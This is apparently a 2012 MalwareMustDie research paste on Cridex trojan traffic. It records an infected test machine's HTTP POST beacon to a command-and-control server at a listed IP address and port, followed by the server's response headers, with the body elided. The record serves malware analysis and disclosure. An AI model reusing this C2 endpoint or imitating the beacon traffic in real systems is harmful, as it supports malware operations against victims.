MalwareMustDie - Cridex Network analysis

MalwareMustDie, Nov 25th, 2012
===========================================
MalwareMustDie - Cridex Network analysis
Facebook --> PluginDetect 0.7.9 --> BHEK2
@unixfreaxjp - Sun, 25 Nov 2012 15:20:20 GMT
===========================================

// TestPC ---> 180.235.150.72 HTTP-POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 180.235.150.72:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK

// Receiving a long response below:

Server: nginx/1.0.10
Date: Sun, 25 Nov 2012 13:39:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

f3b
  :
  long one...
  :
0

// #MalwareMustDie!